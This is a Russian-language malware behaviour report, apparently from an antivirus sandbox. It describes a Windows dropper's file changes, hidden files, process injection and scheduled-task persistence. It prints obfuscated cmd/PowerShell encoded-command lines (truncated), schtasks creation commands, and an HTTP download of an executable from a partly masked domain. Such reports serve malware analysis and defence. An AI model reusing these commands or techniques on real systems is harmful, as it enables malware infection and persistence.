Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\updates\gwdeyjldyupgs
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C PO^W^ERs^HE^LL -e WwBzAHkAcwBUAGUATQAuAFQARQB4AFQALgBlAE4AYwBPAGQAaQBuAEcAXQA6ADoAdQBOAEkAQwBvAEQARQAuAEcAZQBUAHMAVAByAEkATgBHACgAWwBTAFkAUwBUAGUAbQAuAEMATwBOAFYARQByAFQAXQA6ADoAZgBSAG8AbQBC...
Внедряет код в
следующие пользовательские процессы:
- bkmjab.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\bita12e.tmp
- %APPDATA%\gwdeyjldyupgs.exe
- %TEMP%\tmp203.tmp
Присваивает атрибут 'скрытый' для следующих файлов
- %TEMP%\bita12e.tmp
- %APPDATA%\gwdeyjldyupgs.exe
Удаляет следующие файлы
- %TEMP%\tmp203.tmp
Перемещает следующие файлы
- %TEMP%\bita12e.tmp в %TEMP%\bkmjab.exe
Сетевая активность
Подключается к
- 'ce###donia.co':80
TCP
Запросы HTTP GET
- http://ce###donia.co/O4N1l8TCkWcQlXC.exe
UDP
- DNS ASK ce###donia.co
Другое
Создает и запускает на исполнение
- '%TEMP%\bkmjab.exe'
- '<SYSTEM32>\cmd.exe' /C PO^W^ERs^HE^LL -e WwBzAHkAcwBUAGUATQAuAFQARQB4AFQALgBlAE4AYwBPAGQAaQBuAEcAXQA6ADoAdQBOAEkAQwBvAEQARQAuAEcAZQBUAHMAVAByAEkATgBHACgAWwBTAFkAUwBUAGUAbQAuAEMATwBOAFYARQByAFQAXQA6ADoAZgBSAG8AbQBC...' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\GwDEYjLDYUPGS" /XML "%TEMP%\tmp203.tmp"' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e WwBzAHkAcwBUAGUATQAuAFQARQB4AFQALgBlAE4AYwBPAGQAaQBuAEcAXQA6ADoAdQBOAEkAQwBvAEQARQAuAEcAZQBUAHMAVAByAEkATgBHACgAWwBTAFkAUwBUAGUAbQAuAEMATwBOAFYARQByAFQAXQA6ADoAZgBSAG8AbQBCAGEAUwBFADYANABzAF...
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\GwDEYjLDYUPGS" /XML "%TEMP%\tmp203.tmp"
